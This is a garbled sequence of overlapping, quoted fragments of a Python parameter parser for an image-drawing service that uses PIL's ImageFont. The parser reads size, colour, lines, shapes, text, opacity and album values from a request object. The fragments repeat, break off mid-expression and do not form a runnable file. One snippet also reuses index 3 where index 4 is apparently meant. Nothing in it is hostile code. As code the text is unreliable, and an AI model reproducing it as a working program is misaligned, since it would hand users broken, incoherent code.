int(a)) <= 255 else", ":= obj.get('album')) else None if data and len(data) >= 2: return [data[0], data[1]]", "obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i", "analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj)", "line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store']", "if bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args if", "def line(obj): lines = list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for", "params['original'] = o if (o := obj.get('original')) else False params['colour'] = colour(obj) params['album']", ">= 2: bg_args = [bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args", "= i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf,", "(int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0,", "return None def album(obj): data = params.split(',') if (params := obj.get('album')) else None", "data[1]] return None def colour(obj): data = params.split(',') if (params := obj.get('colour')) else", "= [bg[0], '0'] return bg_args else: return None def point(obj): return None if", "= rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj):", ":= int(a)) <= 255 else None return None def album(obj): data = params.split(',')", "None def point(obj): return None if not obj.get('point') else float(obj.get('point')) def size(obj): width", "4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex))", "(int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0,", "dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj,", "obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or '300') return width, height", "if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf =", "text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in", "int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args := obj.get('lines'): line_args =", "'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj)", "None def album(obj): data = params.split(',') if (params := obj.get('album')) else None if", "if (params := obj.get('album')) else None if data and len(data) >= 2: return", "return None def colour(obj): data = params.split(',') if (params := obj.get('colour')) else None", "10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif", "width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if", "return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg", "def text(obj): texts = list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') #", "list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try:", "def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r')", "return bg_args if len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args else:", "obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',') if", ":= o if (o := obj.get('a')) else None: return op if 0 <=", "len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >=", "None def store(obj): bg = None if not obj.get('store') else obj.get('store').split(',') if bg:", "params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj,", "bg_args = [bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args = [bg[0],", "ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf,", "= size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles']", "elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception", ":= obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj) return params def", "ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point']", "'/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if len(text_arg)", "obj.get('a')) else None: return op if 0 <= (op := int(a)) <= 255", "obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if", "obj.get('album')) else None if data and len(data) >= 2: return [data[0], data[1]] return", "def point(obj): return None if not obj.get('point') else float(obj.get('point')) def size(obj): width =", "shapes = list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in", "params def opacity(obj): if a := o if (o := obj.get('a')) else None:", "= rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b')", "def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';')", "if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try: line_arg", "obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2] =", "texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]),", "else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]),", "None if data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]),", "as ex: print(str(ex)) return shapes def text(obj): texts = list() if texts_args :=", "and len(data) >= 2: return [data[0], data[1]] return None def colour(obj): data =", "if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args =", "(0, 0, 0)]) except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape):", "texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]),", "= dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] =", "= [bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args = [bg[0], '0']", ">= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)])", "return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args := obj.get('lines'):", "opacity(obj): if a := o if (o := obj.get('a')) else None: return op", "(int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]),", "(params := obj.get('album')) else None if data and len(data) >= 2: return [data[0],", "or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1]", "text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])),", "if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g')", "else False params['colour'] = colour(obj) params['album'] = album(obj) return params def opacity(obj): if", "int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except", "(0, 0, 0), (0, 0, 0)]) except Exception as ex: print(str(ex)) return shapes", "[bg[0], '0'] return bg_args else: return None def point(obj): return None if not", "= text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] =", "None if not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w')", "rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not", "(op := int(a)) <= 255 else None return None def album(obj): data =", "rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines", ">= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def", "return shapes def text(obj): texts = list() if texts_args := obj.get('texts'): text_args =", "text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],", "i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))])", "(o := obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj) return params", "int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4:", ">= 1: bg_args = [bg[0], '0'] return bg_args else: return None def point(obj):", "texts = list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf =", "or '300') return width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0]", ":= obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try: line_arg = i.split(',')", "return None def store(obj): bg = None if not obj.get('store') else obj.get('store').split(',') if", "bg_args if len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args else: return", "0)]) except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes =", "color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts']", "int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex)) return lines def", "0 <= (op := int(a)) <= 255 else None return None def album(obj):", "len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args else: return None def", "for i in line_args: try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]),", "int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0,", "obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args :=", "int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]),", "int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])),", "if 0 <= (op := int(a)) <= 255 else None return None def", "Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list() if", "else None if data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])),", "params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original']", "height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not", "<= 255 else None return None def album(obj): data = params.split(',') if (params", "1: bg_args = [bg[0], '0'] return bg_args else: return None def point(obj): return", "int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),", "bg[1]] return bg_args if len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args", "texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf'", "store(obj): bg = None if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg)", "colour(obj): data = params.split(',') if (params := obj.get('colour')) else None if data and", "len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0,", "rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else", "shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',') if len(shape_arg)", "in line_args: try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]),", "text(obj): texts = list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf", "None if data and len(data) >= 2: return [data[0], data[1]] return None def", "len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args if len(bg) >= 1:", "def album(obj): data = params.split(',') if (params := obj.get('album')) else None if data", "or '400') height = int(obj.get('height') or obj.get('h') or '300') return width, height def", "line(obj): lines = list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i", "int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]),", "return op if 0 <= (op := int(a)) <= 255 else None return", "if len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args if len(bg) >=", "ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for", "(0, 0, 0)]) except Exception as ex: print(str(ex)) return shapes def text(obj): texts", "int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception as ex:", "shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg)", "if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines =", "int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args := obj.get('lines'): line_args", "obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2])", "rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def", "= list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args:", "= colour(obj) params['album'] = album(obj) return params def opacity(obj): if a := o", "int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg = None if not", "not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or '400')", "obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj) return params def opacity(obj):", "return None if not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or", "= '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if len(text_arg) >= 7:", "len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args)", "return lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape): shape_args", "o if (o := obj.get('a')) else None: return op if 0 <= (op", "i in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]),", "print(str(ex)) return shapes def text(obj): texts = list() if texts_args := obj.get('texts'): text_args", "def opacity(obj): if a := o if (o := obj.get('a')) else None: return", "= texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args:", "None return None def album(obj): data = params.split(',') if (params := obj.get('album')) else", "return None def point(obj): return None if not obj.get('point') else float(obj.get('point')) def size(obj):", "i in text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],", "int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]),", "obj.get('h') or '300') return width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',')", "params['colour'] = colour(obj) params['album'] = album(obj) return params def opacity(obj): if a :=", "else: return None def point(obj): return None if not obj.get('point') else float(obj.get('point')) def", "[bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args = [bg[0], '0'] return", ":= obj.get('colour')) else None if data and len(data) >= 7: return [int(data[0]), (int(data[1]),", "= line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj)", "0, 0)]) except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes", "in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]),", "else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]] return", "elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0,", "size(obj): width = int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h')", "0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0),", "int(a)) <= 255 else None return None def album(obj): data = params.split(',') if", "and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return", "elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0,", "= album(obj) return params def opacity(obj): if a := o if (o :=", "'/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]),", "0, 0), (0, 0, 0)]) except Exception as ex: print(str(ex)) return shapes def", "<= (op := int(a)) <= 255 else None return None def album(obj): data", "params.split(',') if (params := obj.get('album')) else None if data and len(data) >= 2:", "rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not", "params['album'] = album(obj) return params def opacity(obj): if a := o if (o", "int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])),", "= o if (o := obj.get('original')) else False params['colour'] = colour(obj) params['album'] =", "not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2]", "int(rgb[2]) def line(obj): lines = list() if lines_args := obj.get('lines'): line_args = lines_args.split(';')", "not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return", "= params.split(',') if (params := obj.get('colour')) else None if data and len(data) >=", "else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or '400') height =", "bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args if len(bg)", "or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or '300') return width,", ">= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex:", "else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2]", "int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]),", "int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg = None if", "list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try:", "= i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))])", "lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape): shape_args =", "int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]),", "as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args", "int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0,", "point(obj): return None if not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width')", "int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7:", "(int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg = None", "shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]),", "ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] =", "not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list()", "i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif", "text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o", "texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg", "= params.split(',') if (params := obj.get('album')) else None if data and len(data) >=", "= shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >=", "params = dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses']", "if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg", "None def colour(obj): data = params.split(',') if (params := obj.get('colour')) else None if", "7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif", "color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else", "if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif", "(obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1] =", "(int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]),", "(o := obj.get('a')) else None: return op if 0 <= (op := int(a))", "shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception", "int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0),", "0)]) except Exception as ex: print(str(ex)) return shapes def text(obj): texts = list()", "[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception as", "int(data[5]), int(data[6]))] return None def store(obj): bg = None if not obj.get('store') else", "shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg =", "int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])),", "if (params := obj.get('colour')) else None if data and len(data) >= 7: return", "if len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args else: return None", "int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj,", "if not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or", "width = int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or", "params.split(',') if (params := obj.get('colour')) else None if data and len(data) >= 7:", "len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg)", "30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0), ImageFont.truetype(ttf, 30)])", "6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3:", "= ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj)", "line_args = lines_args.split(';') for i in line_args: try: line_arg = i.split(',') if len(line_arg)", "shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg)", "obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if", "store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o :=", "lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]),", "line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]),", "lines_args.split(';') for i in line_args: try: line_arg = i.split(',') if len(line_arg) >= 7:", "text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],", "0), (0, 0, 0)]) except Exception as ex: print(str(ex)) return shapes def text(obj):", "ImageFont def analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines']", "[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >=", "lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex)) return", "len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]),", "return bg_args else: return None def point(obj): return None if not obj.get('point') else", "obj.get('colour')) else None if data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]),", "if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg)" ]
